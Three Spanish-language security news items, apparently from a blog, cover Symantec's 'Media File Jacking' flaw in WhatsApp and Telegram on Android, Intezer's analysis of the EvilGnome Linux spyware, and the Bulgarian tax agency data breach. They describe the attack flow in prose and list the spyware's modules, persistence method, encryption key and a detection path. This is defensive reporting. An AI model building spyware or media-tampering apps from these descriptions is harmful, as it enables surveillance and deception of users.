La vulnerabilidad ha sido descubierta por el equipo de seguridad de sistemas operativos modernos de la firma antivirus ‘Symantec’ y ya ha sido bautizada como ‘Media File Jacking’ y afecta a las aplicaciones WhatsApp y Telegram de la plataforma Android.

El error se da sólo en dos precisos instantes: En el momento en el que la aplicación ha recibido un fichero y lo está escribiendo en la unidad física, y en el momento en el que la aplicación está cargando los ficheros en la Interfaz de Usuario (UI).

Por defecto, la lectura y escritura se hacen en directorios públicos, siendo ‘/storage/emulated/0/WhatsApp/Media/’ el directorio por defecto de WhatsApps y ‘/storage/emulated/0/Telegram/’ el directorio de Telegram, directorios que por defecto son accesibles por una aplicación que tenga permiso para utilizar la memoria externa del teléfono.

Algún lector le habrá saltado la alarma preguntándose: “Si cualquier aplicación con permisos para manipular la unidad extraible… ¿Qué tiene de nuevo o cómo puede afectar la vulnerabilidad?”. Pues la clave está en el permiso ‘WRITEEXTERNALSTORAGE’ que permite la lectura en tiempo real de los archivos que se guardan en memoria sin importa si el fichero pertenece a la aplicación o no. Esto permitiría una manipulación de un fichero e incluso antes de ser mostrado al usuario, pudiendo tener unos efectos devastadores. Ya que el usuario podría tener plena confianza en que un fichero que acaba de recibir de una persona de confianza fuera malicioso.

De esta forma un ataque podría perpetrarse de la siguiente manera:

• Un usuario descarga una aplicación (maliciosa) que requiera el permiso ‘WRITEEXTERNALSTORAGE’, cosa que no es nada fuera de lo normal.
• El usuario a continuación recibe un mensaje de una persona de mucha confianza a través de una estas aplicaciones vulnerables, y que hoy en día son tan comunes en nuestro día a día, y que puede ser leída en tiempo real por la aplicación maliciosa recién instalada.
• La aplicación maliciosa, lee y manipula el fichero recibido a voluntad antes de que sea mostrado al usuario, con el riesgo que pueda acarrear esta acción.

Los investigadores han publicado varios vídeos dónde pueden apreciarse la manipulación de varios ficheros: Una imagen, un documento PDF y un mensaje de voz.

Como posible contramedida se recomienda desactivar el guardado automático de los ficheros, para que en la medida de lo posible puedan ser recibidos en otras aplicaciones que no son vulnerables como las web o las de escritorio. Aunque lo más recomendable para ficheros confidenciales o con información sensible, es utilizar otro canal de comunicación.

Más información:

Symantec Mobile Threat: Attackers Can Manipulate Your WhatsApp and Telegram Media Files
https://www.symantec.com/blogs/expert-perspectives/symantec-mobile-threat-defense-attackers-can-manipulate-your-whatsapp-and-telegram-media

Es un hecho conocido que existen muy pocas cepas de malware de Linux en la naturaleza en comparación con los virus de Windows debido a su arquitectura central y también a su baja participación en el mercado, y muchos de ellos ni siquiera tienen una amplia gama de funcionalidades.

En los últimos años, incluso después de la revelación de graves vulnerabilidades críticas en varios tipos de sistemas operativos y software Linux, los ciberdelincuentes no lograron aprovechar la mayoría de ellos en sus ataques. Sin embargo, los investigadores de la firma de seguridad Intezer Labs descubrieron recientemente un nuevo implante de backdoor de Linux que parece estar en fase de desarrollo, pero ya incluye varios módulos maliciosos para espiar a los usuarios de este escritorio.

Funcionamiento de EvilGnome:

El malware en cuestión ha sido diseñado para tomar capturas de pantalla de escritorio, robar archivos, capturar grabaciones de audio desde el micrófono del usuario, así como descargar y ejecutar más módulos maliciosos.

Segun informan los propios investigadores de Intezer Labs, la muestra de EvilGnome que se descubrió en VirusTotal también contiene una funcionalidad de keylogger inacabada, lo que indica que su desarrollador lo cargó en línea por error.

El malware se disfraza como una extensión legítima de GNOME, un programa que permite a los usuarios de Linux ampliar la funcionalidad de sus escritorios.

El implante de Linux también gana persistencia en un sistema específico utilizando crontab, similar al programador de tareas de Windows, y envía datos de usuario robados a un servidor remoto controlado por un atacante.

Módulos utilizados:

• ShooterSound : este módulo utiliza PulseAudio para capturar el audio del micrófono del usuario y carga los datos en el servidor de C&C del operador.
• ShooterImage : este módulo utiliza la biblioteca de código abierto de Cairo para capturar capturas de pantalla y cargarlas en el servidor de C&C. Lo hace abriendo una conexión con el servidor de visualización XOrg, que es el backend del escritorio de Gnome.
• ShooterFile : este módulo utiliza una lista de filtros para escanear el sistema de archivos en busca de archivos recién creados y los carga en el servidor de C&C.
• ShooterPing : el módulo recibe nuevos comandos del servidor de C&C, como descargar y ejecutar nuevos archivos, establecer nuevos filtros para el escaneo de archivos, descargar y establecer una nueva configuración de tiempo de ejecución, exfiltrar la salida almacenada al servidor de C&C y detener la ejecución de cualquier módulo de disparo.
• ShooterKey : este módulo no está implementado ni se usa, lo que probablemente es un módulo de registro de teclas sin terminar.

En particular, todos los módulos anteriores cifran sus datos de salida y descifran los comandos recibidos del servidor C&C con la clave RC5 «sdg62_AS.sa $ die3», utilizando una versión modificada de una biblioteca de código abierto rusa.

¿Cómo detectar si estás infectado por EvilGnome?

Para verificar si su sistema Linux está infectado con el software espía EvilGnome, puede buscar el ejecutable «gnome-shell-ext» en el directorio «~/.cache/gnome-software/gnome-shell-extensions«.

Dado que los productos de seguridad y antivirus actualmente no detectan el malware EvilGnome, los investigadores recomiendan a los administradores de Linux preocupados que bloqueen las direcciones IP de Comando y Control enumeradas en la sección IOC de la publicación del blog de Intezer.

Más información:

EvilGnome: Rare Malware Spying on Linux Desktop Users
https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/

Muestra EvilGnome en VirusTotal
https://www.virustotal.com/gui/file/7ffab36b2fa68d0708c82f01a70c8d10614ca742d838b69007f5104337a4b869/detection

El presunto responsable, Christian Boykov, detenido hace unos días, ha sido puesto en libertad recientemente. Aprovechó fallos graves de seguridad de la NRA – el equivalente búlgaro de nuestro Ministerio de Hacienda – para conseguir información sensible de millones de ciudadanos del país.

El país ha sufrido el mayor ataque informático de su historia. Distintas fuentes discrepan del número total de afectados, aunque se estima en millones de personas, en un país cuyo censo asciende a aproximadamente a 7 millones. Como consecuencia del incidente y en virtud de la aplicación de la GDPR, la agencia tributaria búlgara se enfrenta a multas de hasta 20 millones de euros.

El presunto sospechoso trabaja como investigador en ciberseguridad y posee formación oficial para la lucha contra el cibercrimen organizado. No obstante, no es la primera vez que salta a la palestra. En 2017 intervino públicamente en televisión para hacer pública una vulnerabilidad encontrada en el Ministerio de Educación de su país, que previamente había reportado a los responsables gubernamentales sin obtener respuesta alguna. Ese incidente le sirvió para ser contratado como profesional de ciberseguridad por la empresa de informática TAD Group, donde seguía trabajando hasta el momento de su detención.

Los detalles técnicos del ataque aún se desconocen, aunque varias fuentes hablan de una filtración de, aproximadamente, 21Gb de información sensible y fiscal de la población búlgara. Igualmente, los diagnósticos en torno a la causa de la brecha difieren entre las partes. Existen declaraciones en el Twitter del atacante donde se alude a la nula securización de las infraestructuras búlgaras. Estas declaraciones, además, vienen avaladas por comentarios de responsables de seguridad gubernamentales que aluden a informes previos donde ya se alertaba del pésimo estado de la seguridad informática del país. En ese sentido, se habla de una filtración que afecta a casi el 70% de la población.

El presidente, sin embargo, afirma que el alcance del incidente es mucho menor del que ha trascendido a los medios y a reseñado la necesidad de contratar «cerebros únicos» como los del presunto atacante, para defender el país contra los crímenes informáticos.

Por otra parte, los técnicos que han tenido acceso a los datos y registros del ataque afirman que el atacante está lejos de haber demostrado cualquier virtuosismo durante la intrusión. Los técnicos insisten en que el atacante se ha limitado a hacer uso de técnicas realmente simples.

Más información:
https://www.24chasa.bg/novini/article/7565893
https://www.infobae.com/america/tecno/2019/07/18/un-hackeo-masivo-expuso-los-datos-de-millones-de-habitantes-en-bulgaria/